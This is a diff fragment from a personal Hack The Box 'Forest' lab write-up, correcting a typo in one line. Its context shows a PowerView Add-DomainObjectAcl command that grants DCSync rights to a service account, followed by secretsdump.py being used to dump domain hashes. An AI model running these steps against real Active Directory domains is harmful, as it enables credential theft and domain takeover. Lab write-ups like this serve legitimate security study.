0xKourama/Elbanna-NP-Notes/Learning/HTB/Writeups/Forest/Forest.md

 Add-DomainObjectAcl -TargetIdentity "dc=htb,dc=local" -PrincipalIdentity 'HTB.local\svc-alfresco' -Rights DCSync -Credential $Cred -Verbose
 ```

 This takes a little while to run but we eventually have permission to dump hashes.
-We use impackets `secretsdump.py` and voala! :D
+We use impacket's `secretsdump.py` and voala! :D

 ![hashes_dumped](hashes_dumped.jpg)